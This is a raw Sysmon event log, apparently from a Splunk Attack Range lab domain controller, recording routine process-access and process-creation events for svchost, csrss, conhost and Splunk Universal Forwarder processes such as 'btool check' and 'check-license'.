13:55:54.714{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007318Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.698{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007317Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.698{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007316Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.698{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007315Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.698{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007314Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.698{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85EA-5FCF-2F01-000000009101}4324C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007313Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.698{10ACEC4A-85EA-5FCF-2C01-000000009101}41404276C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-85EA-5FCF-2F01-000000009101}4324C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1815e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007312Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.713{10ACEC4A-85EA-5FCF-2F01-000000009101}4324C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-85EA-5FCF-2C01-000000009101}4140C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000007311Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.667{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-85EA-5FCF-2E01-000000009101}656C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007310Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.667{10ACEC4A-85EA-5FCF-2E01-000000009101}6562204C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007309Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.433{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EA-5FCF-2E01-000000009101}656C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007308Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.433{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007307Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.433{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007306Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.433{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007305Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.433{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007304Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.433{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007303Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.433{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007302Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.433{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007301Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.433{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007300Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.433{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007299Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.433{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85EA-5FCF-2E01-000000009101}656C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007298Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.433{10ACEC4A-85EA-5FCF-2C01-000000009101}41404276C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-85EA-5FCF-2E01-000000009101}656C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+64ab|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1807c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007297Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.438{10ACEC4A-85EA-5FCF-2E01-000000009101}656C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-85EA-5FCF-2C01-000000009101}4140C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000007296Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.401{10ACEC4A-85EA-5FCF-2D01-000000009101}31681004C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007295Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EA-5FCF-2D01-000000009101}3168C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007294Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007293Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007292Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 